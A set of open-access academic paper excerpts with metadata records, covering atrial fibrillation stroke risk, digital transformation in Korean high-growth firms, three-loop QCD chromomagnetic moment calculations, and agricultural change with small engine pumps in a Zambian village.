therefore need the support most, e.g., the western region.
Above all, our main focus is to develop an empirical approach to evaluate the impact of agricultural production risks on farmers' labor allocations between on-and off-farm income generating activities.Due to the availability of data, the empirical analysis is limited to a cross-sectional sample.However, important problems relating to the dynamic behavior of farmers still remain of interest.In the future, upon access to the longitudinal data of rural households' labor supplies over multiple years, we hope we are able to extend our model and reevaluate this topic.
Figure 2 .
Figure 2. Distribution of farm income per acre and its logarithm in 2010.
Figure 3 .
Figure 3. Distribution of farm income per acre and its logarithm.
Figure 4 .
Figure 4. Actual ratio and average estimated probability of taking off-farm jobs.(a) Actual ratio of farm households with off-farm jobs; (b) Average estimated probability of taking off-farm jobs by farm households.
Table 1 .
Characteristics in two household categories.
Table 2 .
Characteristics in the rural labor force.
Table 3 .
Definition and statistics of variables (household-level).
Table 4 .
Definition and statistics of variables (individual-level).
Table 5 .
Logit estimates of household-level participation equation.
Table 6 .
Marginal effects of the household-level participation equation.
Table 7 .
Logit estimates of the individual-level participation equation. | 2019-02-06T06:02:54.308Z | 2019-01-29T00:00:00.000 | {
"year": 2019,
"sha1": "a5bc94b59ade6211f9e307375465c06c15500dfb",
"oa_license": "CCBY",
"oa_url": "https://www.mdpi.com/2071-1050/11/3/697/pdf?version=1549014717",
"oa_status": "GOLD",
"pdf_src": "ScienceParseMerged",
"pdf_hash": "a5bc94b59ade6211f9e307375465c06c15500dfb",
"s2fieldsofstudy": [
"Economics"
],
"extfieldsofstudy": [
"Economics"
]
} |
243822485 | pes2o/s2orc | v3-fos-license | Residual Stroke Risk in Atrial Fibrillation
AF contributes to increased stroke risk via various mechanisms, including deranged blood constituents, vessel wall abnormalities and abnormal blood flow. This excess risk is frequently managed with anticoagulation therapy, aimed at preventing thromboembolic complications. Yet, a significant proportion of patients with AF remain at high residual stroke risk despite receiving appropriate dose-adjusted anticoagulation. This article explores the residual stroke risk in AF and potential therapeutic options for these patients.
Residual Stroke Risk in AF
To begin with, it is important to recognise that anticoagulation therapy reduces, but does not negate, the risk of stroke in AF. Recent estimates among patients with AF found that the annual incidence of stroke or systemic embolism with warfarin was 1.66%, an improvement compared with previous reports of 2.09%, which the authors attributed to better quality of anticoagulation control. 9 There was a significant increase in the annual incidence of stroke or systemic embolism in patients with additional concomitant risk factors (CHADS 2 score ≤1: 0.89% per year; CHADS 2 score 2: 1.43% per year; CHADS 2 score ≥3: 2.50% per year). 9 Notably, the quality of anticoagulation control in that meta-analysis of eight randomised controlled trials, determined using time in therapeutic range (TTR) as between 55% and 68%, remained suboptimal based on the recommendations of >70% according to current international guidelines. [7][8][9] Given the importance of anticoagulation control, efforts were directed at achieving and maintaining a high TTR (>65-70%), especially in high-risk subgroups with AF, in order to improve clinical outcomes. 10 However, the introduction of direct oral anticoagulants (DOACs) has changed the landscape of treatment in patients with AF such that TTR is a distant memory in those treated with these newer agents, although compliance continues to be an issue. 11,12 Overall, DOACs have been shown to be more effective than warfarin for the prevention of stroke or systemic embolism, even in various high-risk AF subgroups, such as patients with concomitant heart failure, valvular heart disease and coronary artery disease. [13][14][15][16] In addition, DOAC therapy may reduce stroke severity compared with warfarin. 17 Nonetheless, in landmark clinical trials evaluating the different DOAC agents against warfarin among patients with AF, the residual risk of stroke or systemic embolism despite anticoagulation treatment was between 1.11% and 2.40% per year ( Table 1). [18][19][20][21] Similar, if not higher, rates of between 1.73% and 2.78% were reported in real-world studies. 22 This residual risk should not be underestimated because the threshold for consideration of oral anticoagulation in AF is approximately 0.9%, corresponding to a CHA 2 DS 2 -VASc score of 1, for the risk of thromboembolism. Therefore, there is a need for greater awareness among clinicians and better risk stratification of residual stroke in patients with AF.
There are several potential mechanisms of stroke despite anticoagulation, including small vessel disease, intracranial or extracranial atherosclerotic disease, cryptogenic stroke, arterial dissection and hypercoagulable states (e.g. inherited thrombophilia, antiphospholipid syndrome).
Medication errors have also been previously reported to be common among patients with AF. 23 Furthermore, there are other causes of cardioembolic stroke besides AF, such as mitral stenosis, mechanical heart valves and left ventricular thrombus. An in-depth review of these factors has previously been published. 24 Importantly, anticoagulation therapy has not been proven to be beneficial for stroke prevention in most of these conditions despite an excess risk of bleeding.
Risk Factors for Residual Stroke Risk
AF is a multimorbid condition that is predisposed by the presence of risk factors such as advancing age, hypertension, diabetes, chronic kidney disease, heart failure and coronary artery disease. 25,26 In addition, AF accelerates the progression of disease for many of these risk factors. [26][27][28] Hence, AF rarely occurs in isolation, and concomitant diseases may influence the residual stroke risk either by their individual effects, synergism with AF or by reducing the effectiveness of anticoagulation therapy. Numerous risk factors have been shown to be associated with an increased residual stroke risk in AF. However, there are currently no risk stratification tools that have been validated for the prediction of residual stroke risk in anticoagulated patients with AF. As a result, the identification of high-risk patients can be difficult, especially in the busy clinical environment.
Recently, a cohort study of patients who suffered from stroke despite DOAC therapy identified that most of these patients were older, female and hypertensive, with at least Stage 2 chronic kidney disease (estimated glomerular filtration rate <90 ml/min; Table 2). 29 However, that study by Szeto and Hui was limited by its retrospective design and small sample size. 29 A prospective case-control study showed that the use of off-label low-dose DOACs, atrial enlargement, hyperlipidaemia, a high CHA 2 DS 2 -VASc score and non-paroxysmal AF were independently associated with an increased risk of stroke events among AF patients. 30 Main contributors from the CHA 2 DS 2 -VASc score were increasing age, diabetes, congestive heart failure and prior stroke or transient ischaemic attack (TIA). Unlike in the study of Szeto and Hui, female sex and hypertension were not found to be independent risk factors. 29,30 Interestingly, Paciaroni et al. reported that approximately 30% of patients with cerebrovascular events had stroke due to causes other than cardioembolism; this reinforced the concept that ischaemic stroke in patients with AF is not exclusively cardiogenic in nature. [30][31][32] A post hoc analysis of the SPORTIF trials demonstrated that age ≥75 years, coronary artery disease, smoking and non-use of alcohol were significant predictors of thromboembolism. 33 Using data of anticoagulated patients with AF from the AMADEUS clinical trial, Senoo et al. demonstrated worse outcomes of stroke or systemic embolism, and death among those with permanent AF, prior cerebrovascular events, coronary artery disease and impaired renal function. 34 However, the results of that post hoc analysis should be interpreted with caution given the historical nature of the trial even though event outcomes were adjudicated. 33 A meta-analysis of three randomised controlled trials focusing on warfarinised patients with AF found that age ≥75 years, female sex, prior stroke or TIA, vitamin K antagonist-naïve status, moderate or severe renal failure, previous aspirin use, Asian race and a CHADS 2 score ≥3 were associated with higher stroke rates. 35 Nonetheless, given the known importance of the quality of anticoagulation control and the fact that it could not be assessed within different subgroups of that meta-analysis, it was unclear whether the predictors identified were directly related to stroke risk or indirectly via their influence on anticoagulation control. 36 In addition, the effects of these risk factors on DOAC therapy remained untested within that study. 35 In contrast, Pancholy et al. performed their meta-analysis using patients from both treatment groups (warfarin and DOAC) and demonstrated that female patients with AF who were treated with warfarin had a greater residual risk of stroke than their male counterparts, but no sex differences were observed with DOACs. 37 Recently, a retrospective cohort study reported that the risk of ischaemic stroke or systemic embolism among patients with AF remained markedly higher than that of the general population even after anticoagulation therapy, as observed previously. 38,39 Furthermore, approximately onethird of the residual risk was secondary to modifiable factors, including hypertension, diabetes and hyperlipidaemia. 38 Overall, there appears to be an overlap between many of the risk factors for residual stroke risk in AF ( Figure 1) and those that predispose to stroke events in nonanticoagulated AF patients. 40 Nonetheless, the former remains poorly defined and further studies are needed to determine the extent and mechanisms by which these risk factors affect residual stroke risk in AF.
Potential Treatment Options
Despite some awareness of residual stroke risk in AF, this issue presents a clinical problem to physicians because there is little evidence on effective management strategies for patients recognised to be at high risk. In this regard, several studies have explored the use of antiplatelet agents in addition to anticoagulation to further minimise stroke risk in AF. However, this approach should not be advocated for the management of residual stroke risk among the general AF population given the increased risk of harm and lack of demonstrable benefit. 41 There is growing evidence to suggest that AF patients who have previously suffered a stroke despite anticoagulation are at increased risk of subsequent strokes compared to anticoagulation-naïve patients, highlighting the importance of managing the residual risk of ischaemic stroke in AF. [43][44][45] There are several other strategies that have shown positive results for this purpose, including catheter AF ablation, left atrial appendage (LAA) occlusion and adherence to theAF Better Care (ABC) pathway. It is important to highlight that none of these approaches has been specifically proven for the management of residual stroke risk in AF.
Catheter AF Ablation
Contemporary international guidelines recommend rhythm and/or rate control strategies for symptom management in patients with AF. 6,8 This was on the basis of historical studies performed over a decade ago that failed to demonstrate any prognostic advantage of one over the other. [46][47][48] Nonetheless, the results of these studies were confounded by the fact that there were high rates of anticoagulation discontinuation during follow-up among patients who were randomised to receive a rhythm control strategy. A post hoc analysis of the ATHENA trial suggests that a rhythm control approach in addition to usual care may reduce stroke events among patients with AF. 49 Recent evidence demonstrates that early rhythm control, by any means, in AF was beneficial in reducing cardiovascular events (including stroke) compared with rate control. 50 AF ablation is a means of rhythm control and an established treatment for patients with drug-refractory symptomatic AF. Although not used for the sole purpose of risk modification, several observational cohort studies have reported that catheter AF ablation was independently associated with a lower risk of ischaemic stroke, the effects of which were more pronounced among patients with higher CHA 2 DS 2 -VASc score ( Table 3). [51][52][53][54][55] In a study of patients with AF and prior stroke, Bunch et al. found that patients who underwent catheter AF ablation had lower rates of recurrent stroke over a 5-year period compared with those who were not ablated. 56 Notably, the long-term rates of recurrent stroke were comparable between ablated AF patients and non-AF patients. 56 Similar results were obtained in a nationwide study using the Korean National Health Insurance Service (NHIS) database. 57 Recent meta-analyses reinforced that catheter AF ablation significantly reduces the risk of thromboembolism compared with medical therapy alone. 58,59 Importantly, the vast majority of patients in these studies were anticoagulated, suggesting that catheter AF ablation may have a role as adjunctive therapy in the management of residual stroke risk in AF. A further advantage of this strategy is that it may be combined with LAA occlusion (discussed below) in a single procedure. 60 Overall, although catheter AF ablation has shown promise, it is not currently indicated for the reduction of stroke risk in AF because it remains unclear whether this approach may interrupt the natural history of AF and/or cause a significant alteration in the subsequent stroke risk, despite the results from observational studies. This is supported by the lack of a temporal relationship between AF episodes and stroke complications, and an increased risk of thromboembolic events with traditional risk factors, even in the absence of AF. 1,61,62 Moreover, the recent CABANA trial failed to demonstrate a significant benefit of catheter ablation over drug therapy
Results of Catheter Ablation versus Non-ablation
Friberg et al. 54 for the composite endpoint of all-cause death, disabling stroke, serious bleeding or cardiac arrest in the intention-to-treat analysis. 63 For patients who undergo catheter AF ablation, there is some debate as to whether anticoagulation therapy is necessary among those with successful maintenance of sinus rhythm after the initial prothrombotic phase postablation. In the landmark AFFIRM trial, patients randomised to the rhythm control arm exhibited a trend towards a greater risk of ischaemic stroke that largely occurred following discontinuation of anticoagulation therapy, indicating that the decision for anticoagulation should be guided by stroke risk factors rather than the perceived success of maintaining sinus rhythm. 47 This observation may be due, in part, to undetected, asymptomatic recurrences that commonly occur in the postablation period, often found only with more aggressive monitoring strategies. 64 Lately though, there is some evidence to suggest that the stroke risk in AF is significantly lowered by catheter ablation such that the risk-to-benefit ratio may favour the suspension of oral anticoagulation following a successful procedure. 65 A meta-analysis of seven retrospective cohort studies demonstrated that the withdrawal of anticoagulation 3 months after successful radiofrequency catheter AF ablation was associated with a significant reduction in the risk of haemorrhage, and no difference in thromboembolic events at both short-and long-term follow-up. 66 Nonetheless, this is a topic that warrants further investigation. Presently, the decision of whether to anticoagulate patients with successful catheter AF ablation should continue to be guided by individual stroke risk factors, as per contemporary international guidelines. 7,8
Left Atrial Appendage Occlusion
The LAA is an important structure in AF because the majority of cardioembolic stroke originates from here. [67][68][69] Therefore, occlusion of this structure acts to isolate and prevent clot formation and subsequent embolisation. LAA occlusion may be performed using either a surgical or percutaneous approach. The latter is emerging as a viable treatment alternative to anticoagulation in AF, although more research is required to define its exact role. 70 A meta-analysis of five randomised controlled trials of patients with AF or risk factors for AF comparing LAA occlusion to standard of care using anticoagulation therapy (in the era of warfarin) found that LAA occlusion was at least non-inferior for stroke prevention with a potential for reduction in mortality. 71 The PRAGUE-17 randomised control trial demonstrated that among AF patients with a high risk of stroke (mean CHA 2 DS 2 -VASc score 4.7), LAA occlusion was non-inferior to DOAC therapy in preventing major AF-related cardiovascular, neurological and bleeding events. 72 These results were reaffirmed in a real-world registry of AF patients with a very high stroke risk (CHA 2 DS 2 -VASc score ≥5) and 'unacceptable' risk of bleeding, where the residual annual ischaemic stroke risk was 2.8% after LAA occlusion. 73 Furthermore, data from the Amplatzer Cardiac Plug registry suggest that LAA occlusion may be an effective treatment option for secondary stroke prevention in AF patients with anticoagulation-resistant stroke. 74 Nonetheless, the retrospective nature of that small observational study should be acknowledged.
Importantly, none of the aforementioned studies showed that treatment with LAA occlusion was superior to anticoagulation for stroke prevention in AF. Recently, the LAAOS III trial reported that among patients with AF who had undergone cardiac surgery, the risk of ischaemic stroke or systemic embolism over a follow-up period of 3.8 years was lower with concomitant LAA occlusion than without it. 75 The vast majority of patients who received LAA occlusion remained on anticoagulation therapy, proving the notion that there is a combined effect of LAA occlusion and anticoagulation for stroke prevention in AF. Overall, the use of LAA occlusion as add-on therapy to anticoagulation in AF for patients with high residual stroke risk remains to be proven, although it may offer some hope in desperate situations. 76,77 AF Better Care Pathway The ABC pathway was introduced as a means to facilitate an integrated management of patients with AF in a holistic manner. 78 It was founded on three main principles: 'A', avoid stroke; 'B', better symptom management; and 'C', cardiovascular and comorbidity optimisation. Post hoc analysis of the AFFIRM trial showed that an integrated care approach based on the ABC pathway was associated with a significant decrease in the composite risk of stroke, major bleeding and cardiovascular death compared with non-ABC care. 79 However, this finding was largely driven by a reduction in the risk of major bleeding and cardiovascular death, because stroke risk was not statistically different between the groups. Similarly, the risk of stroke was unchanged in AF patients with clinical management adherent to the ABC pathway from the ESC-EORP Atrial Fibrillation General Long-Term Registry. 80 In contrast, nationwide cohort studies of AF patients from the Korean NHIS database demonstrated a significant reduction in the rates of ischaemic stroke with implementation of the ABC pathway. 81,82 In addition, the mAFA-II trial found that patients who were randomised to mobile health management based on the ABC pathway (versus usual care) had lower rates of ischaemic stroke. 83 Overall, differences in the results of the aforementioned studies may be related to the methods in which the ABC pathway was evaluated and patients were deemed to be ABC adherent.
A recent meta-analysis of the ABC pathway in AF showed that this strategy was associated with a 45% reduction in the risk of ischaemic stroke, indicating the benefit of this approach in the management of residual stroke risk in AF. 84
Management of Residual Stroke Risk
It is recommended that the management of patients with AF includes a holistic approach by combining patient education, lifestyle modification, psychosocial management and strategies that promote medication adherence. 8 Hence, I propose that the management of residual stroke risk in AF should incorporate the implementation of an integrated, multidisciplinary care strategy with clear communication between healthcare professionals and a structured approach (Table 4). In this regard, the importance of appropriate administration of dose-adjusted anticoagulation therapy in AF should not be overlooked because the use of off-label doses has been linked to poorer outcomes. 85,86 The detection and management of modifiable risk factors associated with AF, such as hypertension, coronary artery disease, heart failure, diabetes, hyperthyroidism, obesity and valvular heart disease, must also be prioritised. An in-depth review of this has been published elsewhere. 87 Moreover, other sources of stroke risk should be considered, because some may have a major effect on overall management strategies. 24 Given the limited evidence in this area, the decision to pursue specific treatment options such as catheter AF ablation and LAA occlusion to minimise residual stroke risk in AF should be individualised.
Conclusion
Residual stroke risk among anticoagulated patients with AF represents a real challenge in the clinical environment. Presently, the identification and subsequent management of high-risk individuals are poorly explored topics. Future studies are needed to define risk factors of residual stroke in AF and determine the effects of specific treatments in this patient cohort. | 2021-11-07T16:15:01.389Z | 2021-10-01T00:00:00.000 | {
"year": 2021,
"sha1": "512a357f0cc8a861e3ea96c967a1a5ea7d932389",
"oa_license": "CCBYNC",
"oa_url": "https://doi.org/10.15420/aer.2021.34",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "0434d1c76e547a32a911da061650c51ac980e468",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
245788105 | pes2o/s2orc | v3-fos-license | Exploratory Study on Digital transformation: Capabilities and Expected Performances
Nowadays many firms encounter the macro-level changes called digital transformation and research on it has drastically increased since 2014. In response to this emerging phenomenon, this study explores how firms prepare for digital transformation and what do they expect from it. More specially, based on the survey from 439 Korean scaleup firm (high-growth firm), we suggest the concepts to necessary capabilities for and expected performance improvement through digital transformation. Our study illustrates that how a firm’s perceptions on those concepts varies upon firm size and industry type. Additionally, our study offers a clue for ‘digital divide’ that can potentially threaten the survival of numerous firms.
Introduction
In recent years, the business world has encountered the macro-level changes sourced from of digital transformation. While digital transformation is not a completely new topic to many entities across the areas, the growing body of research has been shown since 2014 (see Figure 1, Google trend). However, as mentioned above digital transformation comes with unprecedented changes and convergence across various technological domain and industrial sectors, it can be a double-edged sword to both incumbents and new ventures. Although it can potentially provide diverse and constructive collaboration opportunities to many firms (Luo, 2021), it can also threat the business of many firms as existing technological standards and business systems will be drastically either changed or challenged (Oh & Rhee, 2008).
In response to this mixed expectation on digital transformation, this study explore how firms are currently viewing digital transformation in terms of preparation and desirable outcomes. More specifically, by using the Korean high-growth firm data, we first offer the results of survey implying what types of capabilities those high-growth firms pereceive as key capabilities to cope with changes sourced from digital transformation and what types of firm performances they anticipate to achieve. Then, we shift our attention to important firmspecific characteristics, firm size and industry type that can matter when firm adopt marcolevel changes (Li et , and provides a comparative analysis. The results indicate taht firms' perception of and preparations for digital transformation vary upon firm-specific charateristics. We also find that some firms might suffer from digital divide (bipolarization of digital capability).
Fig. 1. Interest in Digital Transformation
Source: Google Trend.
Selection of capabilities and performance
To design survey, we select the following three capabilities: (1) business capability that refers to a firm's ability for task management, process improvement, and data management (2) digital capability, which is defined as a firm's technological capability for programming, software development, and data analysis (3) soft capability that refers to a firm's capability for problem-solving, collaboration, and creativity management. Those capabilities are necessary to achieve innovation (Teece, 1986(Teece, , 2018. The reason we focus on these three capabilities is that a firm's ability to cope with macro-level changes ultimately depends on how a firm develop necessary technologies, how a firm apply those technologies to real business activities and how a people in those firms manage these transitional processes. Regarding anticipated performances that firms eventually aim to achieve, we develop three performance dimensions, which are (1) profitability growth (2) new product development and (3) new partnership.
Sample collection
We implemented a survey based on the list of scaleup firms in Korea. To collect the sample firms, we first draw on the Korea Enterprise Data (KED) database subscribed by Science and Technology Policy Institute (STEPI), and gather the initial sample firms that have shown 20 percent increase in sales with more than 10 employees during the period of 2016-2018. This initial sample include 3,391 scaleup firms. Then, we sent email survey to all these firms and a total of 439 survey was received with response rate of 13%. We classified those 439 firms based on two categories, firm size and industries. Regarding the former category, while 86 firms (20%) belong to a large firm, 353 firms (80%) were Small and Medium Enterprises (SMEs). In relation the latter category, while manufacturing industries comprised 44% of the sample (194 firms), non-manufacturing firms such as service consist 56% of the sample (245 firms). We designed a survey questionnaire by referring to 2019 ScaleUp Survey of Scaleup Institute, the UK private sector, not-for-profit company (s).
Analysis
Collected data were analyzed with a focus on the following four matters: (1) importance of digital transformation and preparations, (2) expected change digital transfor-mation would bring to the industry and main products, (3) capabilities necessary to prepare for digital transformation, and (4) anticipated performance improvement from digi-tal transformation. Digital transformation is a macro-trend phenomenon that affects all industries and many firms, but individual firms may have different views depending on their characteristics or the industry to which they belong. Therefore, this study applies the classification method according to firm size and industrial characteristics for each of the aforementioned matters. Table 1 shows firms' percption on "capabilities considered important to prepare digital transformation" depending on firm size and industry typel. In all capabilty types, smallmedium size firms show more than 50% o "neutral" views and low level of 'Positive' views, indicating that small and medicum size firms have pessimistic perspective on needs of those capabilites. Simiarily, compare to manufaturing firms, non-manufacturing firms have more 'Neutral' and 'Negative' perspective on the value of each capability. Table 2 shows firms' expectation on "performance impovement through digital transformation. Compared to small-medium firms, large firms show more optimistic view and less pessemistic view on each performance dimenstion. Similarily, compared to nonmanufacuting firms, manufacturing firms show more optimistic view on each performance dimenstion. After explore the general perspective of firms on each dimenion of capability and perforamnce, we conduct sets of OLS regression to get further insights on the relationship between those capabilites and performances. Table 3 shows summary statisctics and indicate that each dimension of capabilites and performances is highly correlated. Hence, we maily focus on the direct relationship between each capability and performance. Table 4-7 show the result of OLS regression. As expected, while each capability has significant and positive relationship with each anticipated performance, Table 5 shows interesting results. In case of large firms, no capability has significant impact on new product development. This may indicate that large firms view digital transformation as instrument to renovate business model and network rather than merely developing new product. The findings presented in Table 4-7 does not necessarily mean the impact of those capabilities on three types of performances are confirmed. Rather, it reflects how people in firms perceive or believe the association between capabilities and performances. However, it is still meaningful and valid to understand how various firms interpret encounting situations and changes brought by digital transformation. We coduct additional analysis to explore more detailed picture of how firm size and industry type conjontly influence the relationship between capabilities and expected performance. While most of main effect of individual capability show significant and positive effect of each expected performance, full model illustrate more interesting findings. (We do not report the main effect of individual capability here due to the space limit). Table 8 shows that large-manufacturing firms and smal-medium non-manufacturing firms demonstrate some statistically signifianct results. Interestingly, in case of large-manufacturing firms, business capabiliy and firm profitability are negatively related. This finding does not mean business capability for digital transformation leads firms experience to lower profitability. Instead it implies that people in large-manufacturing firms does not view business capability as a key determinant of profitability in the era of digital transformation. However, they consider digital capability as a positive and key determinant of it.
Discussion
Our study provide unique insights in several ways. First, we offer useful concepts to evaluate capabilities for and expected outcome of digital transformation. In our survey, three important capabilities for digital transformation (business, digital, soft capabilities) and three expeceted performanace improvement (profitability, new product development, new partnership) are addressed. More importantly, our study demonstrate how those concepts are differently perceived to an individual firm. While large size firms and manufacturing firms show more positive perspective on digital transformation in terms of both capabilities and expected outcomes, those firms demonstrate some interesting patterns such as negative or no effect (in fact, perceived expectation) of businss capability on performances.
More importantly and interestingly, by investigating firm size effect and industry effect, our study offer a clue for 'digital divide' that can potentially threaten the survival of numerous firms that fail to adopt relevant skills and capabilities to prepare digital transformation. As digital transformation will come with unprecedented degree of convergence across industrial sectors, the negative effect of digital divide can creat trenmendous ineuqlity among firms (e.g., large firm vs. small firm). This may recall for policy maker considering some policy efforts for balanced development. | 2022-01-07T16:16:01.044Z | 2022-01-01T00:00:00.000 | {
"year": 2022,
"sha1": "f08b17ea4e912ce36aa0a5fb580276dccfe6c26a",
"oa_license": "CCBY",
"oa_url": "https://www.shs-conferences.org/articles/shsconf/pdf/2022/02/shsconf_ies2021_01014.pdf",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "85e31d7e4c0508ce7a0ed8144dee7288e562d386",
"s2fieldsofstudy": [
"Business"
],
"extfieldsofstudy": []
} |
118493341 | pes2o/s2orc | v3-fos-license | Light quark mass effects in the chromomagnetic moment
We present the three-loop QCD corrections to the quark chromomagnetic moment including two different nonzero masses. This is a necessary ingredient to obtain the corresponding corrections to the chromomagnetic coefficient in the Heavy Quark Effective Theory (HQET) Lagrangian.
Introduction
The anomalous magnetic moment of the electron and the muon are among the most precisely measured observables in particle physics. Comparing the theoretical and experimental predictions for the muon magnetic moment there is currently a 3.4σ discrepancy [1] with the Standard Model (SM) which makes this observable very interesting at the moment. We calculate finite light quark mass contributions to the chromomagnetic moment of quarks, and obtain, as a byproduct, the corresponding corrections to the above mentioned observables and can confirm the results of Refs. [2,3,4]. Another byproduct of our calculation is the anomalous magnetic moment of heavy quarks, the bottom quark in particular, where we include the effect of a finite charm quark mass. The magnetic moment of quarks has not yet been measured experimentally, however, for the bottom and the lighter quarks there are upper limits from LEP1 data [5]. Due to the lack of space in these proceedings we will present analytic results for this observable in Ref. [6].
Whereas the anomalous magnetic moments of fermions are physical observables, the chromomagnetic moment is not. Nevertheless, it plays a crucial role in HQET, where it enters the matching coefficient of the chromomagnetic interaction operator [7]. The one-loop correction to the chromomagnetic moment has been obtained in Refs. [8,9]. In Refs. [10,11], the two-loop calculation has been performed, whereas light quark mass effects to this order have been obtained in Ref. [12]. An estimation of higher order corrections has then been given in Ref. [13] and the three-loop correction with one mass scale was finalized in Ref. [7]. In the latter the aforementioned matching coefficient of HQET is almost trivially obtained from the chromomagnetic moment. In the case with two mass scales, additional diagrams have to be calculated in the effective theory to match it to full QCD. We will present the matching coefficient in Ref. [6] and restrict the following discussion to the chromomagnetic moment. The results given in these proceedings have been published in Ref. [14]. respectively. Note that we use the background field method for the external gluon.
Calculation of the chromomagnetic moment
To calculate the chromomagnetic moment we have to consider the quark-anti-quark-gluon vertex in the background-field formalism in QCD. We consider the effect of a nonzero light quark mass at the three-loop level to this quantity. Sample diagrams which have to be calculated are depicted in Fig. 1. When both the quark and anti-quark are on the (renormalised) mass shell and have physical polarisations, the vertex Γ µ a = Γ µ t a can be decomposed into two form factors, where q = p 1 − p 2 is the gluon momentum and p 1 and p 2 are the momenta of the quark and anti-quark, respectively. The anomalous chromomagnetic moment is given by µ c = Z OS 2 F 2 (0), where Z OS 2 is the quark wave function renormalisation constant in the on-shell scheme. The total quark colour charge is given by Z OS 2 F 1 (0) = 1. Thus, F 1 (0) is the inverse of the on-shell wave function renormalisation constant, which has been calculated to three-loops including light quark masses in Ref. [15]. Therefore, the calculation of F 1 (0) provides a strong check on the correctness of our result.
All Feynman diagrams are generated with QGRAF [16] and the various topologies are identified with the help of q2e and exp [17,18]. In a next step the reduction of the various functions to so-called master integrals has to be achieved. For this step we use the so-called Laporta method [19,20] which reduces the three-loop integrals to 27 master integrals. We use the implementation of Laporta's algorithm in the program Crusher [21]. It is written in C++ and uses GiNaC [22] for simple manipulations like taking derivatives of polynomial quantities. In the practical implementation of the Laporta algorithm one of the most time-consuming operations is the simplification of the coefficients appearing in front of the individual integrals. This task is performed with the help of Fermat [23] where a special interface has been used (see Ref. [24]). The main features of the implementation are the automated generation of the integration-byparts (IBP) identities [25], a complete symmetrisation of the diagrams and the possibility to make use of a multiprocessor environment. As we need the form factors at zero momentum transfer all occurring master integrals are on-shell propagator-type integrals. They have been calculated using different analytical and numerical methods, see Refs. [15,26] for details. To calculate the colour factors, we have used the program described in Ref. [27].
Results
We write the chromomagnetic moment in the form where γ E = 0, 57721... is the Euler-Mascheroni constant. α s denotes the strong coupling constant with n f = n l +n m +n h active flavours (n l , n m and n h are the number of massless, light and heavy quarks, respectively). In practise, n m and n h will be equal to one, but we keep them explicitly in our results in order to track the various classes of diagrams in the result. We further decompose the three-loop contribution containing light quarks with nonzero mass into its colour structures where C F = (N 2 c −1)/(2N c ) and C A = N c are the eigenvalues of the quadratic Casimir operators of the fundamental and adjoint representation for the SU(N c ) colour group, respectively. In the case of QCD we have N c = 3 and T F = 1/2. The dimension of the fundamental representation is given by N F = N c . The symmetrised trace of four generators in the fundamental representation is given by d abcd . We present our results at the renormalisation scale µ = M h , where M h is the pole mass of the heavy quark. The nonzero pole parts of the various contributions in (3) are given by The contribution to C AAM and C F AM is presented as a series expansion up to third order in the quark mass ratio x = M m /M h , where M m is the pole mass of the light quark. The results for the finite parts of the different colour structures are given in graphical form in Fig. 2 for 0.2 < x < 0.4, which is relevant for charm mass effects in the chromomagnetic moment of the bottom quark. The mass dependence of the bottom quark in the chromomagnetic moment of the top quark can safely be neglected and the results at x = 0 from [7] can be used. The analytic results including the renormalisation scale dependence will be given in [6]. | 2009-05-31T03:13:09.000Z | 2009-05-31T00:00:00.000 | {
"year": 2009,
"sha1": "c1628090eacc894fa96adb8151f1e02546e63030",
"oa_license": null,
"oa_url": null,
"oa_status": null,
"pdf_src": "Arxiv",
"pdf_hash": "c1628090eacc894fa96adb8151f1e02546e63030",
"s2fieldsofstudy": [
"Physics"
],
"extfieldsofstudy": [
"Physics"
]
} |
203164714 | pes2o/s2orc | v3-fos-license | Agricultural Change and Unstable Production over a 20 - year Period in a Central Zambian Village ─ Under the Penetration of a Market Economy and the Farmers’ Response ─
In Zambia, the development of the market economy and free trade has affected agricultural production and the rural economy since 2000s. This paper focuses on the change in the farming from both technological and economic viewpoints. The focus is on maize production and small - scale irrigation farming using small engine pumps in the wetlands in addition to modern inputs such as fertilizer, seeds and chemicals. They have attained crop diversification, two crops a year of maize and high rates of farm production. How-ever, high - cost agricultural production may increase vulnerability of some farmers who can’t afford to pay for the cost.
Introduction
In 1991, Zambia became a multiparty democracy, representing a shift in the political and economic milieu from a socialist, governmentled economy to the liberalizing of the market economy. Unfortunately for Zambia, its economy has declined dramatically in the 1990s. However, since 2001 under the "New Deal Policy" of the previous president, President Mwanawasa Such a high rate of economic growth has resulted in a growing demand for food. This paper explores the changes in agricultural production from both technological and economic viewpoints. The focus is on maize production (with maize as both a staple food crop and a cash crop) and smallscale irrigation farming using small engine pumps in the wetlands (dambo).
The data used come from a village where field surveys have been conducted for almost 20 years (1992 -2010). In the mid -2000s, farmers from this village began to use small engine pumps (hereafter, engine pumps). The engine pump, as an agricultural investment, is one of the most expensive assets for the smallscale farmer. As will be discussed in greater detail further in the paper, these farmers have responded positively to the economic incentives purchased by way of the greater opportunities that have arisen from the development of the market economy.
The entrance of the village (a small town is positioned there) is located about 90 km north of Lusaka. The land area of the village covers approximately 5 -6 km 2 and it is positioned approximately 3 km southeast, at its closest point, from the entrance and 8 km from the innermost point in a straight line. The small town, which is expanding, has many stalls selling a variety of crops, including tomatoes and watermelons.
Prior to the early 2000s, there were no shops in the village but now there are shops selling a range of goods including seeds, chemical fertilizers, and agrochemicals. Before we analyze the smallscale irrigation farming practices of the village, we should discuss largescale irrigation farming, particularly the center pivot method.
-1 Farm Inputs
As already mentioned, the small town near the entrance of the village has experienced recent expansion. The Google Earth satellite photos in This shop made an agency contract with Pioneer, a company that sells seeds for a variety of crops.
The owner of the shop received training from Pioneer regarding how to advise farmers on the use of weed killer as well as selling seeds.
-2 Agricultural Products
Recent observations have shown that there is now a greater range of agricultural products in the markets alongside the tarmac road and even in the village farms. At the end of the 1990s, the main crops for sale in the village were maize, tomatoes, watermelon, Chinese rape, and a small number of other crops. In addition to these traditional crops, others are now being grown including maize in the dry season, popcorn, sweet potatoes, cowpeas, beans, impua, eggplant, okra, leek, onion, green pepper, cabbage, Chinese cabbage, squash, and butternuts. Since the mid -2000s, the demand for food has grown, particularly from mine workers.
Introduction of the Small Engine Pump
Since the mid -2000s, the number of farmers who are using small engine pumps has increased (Table 1) terms of fertilizing can be attributed to the intensification of maize production (Fig. 3). Of the 17 engine pump users, only four were using FISP.
Season
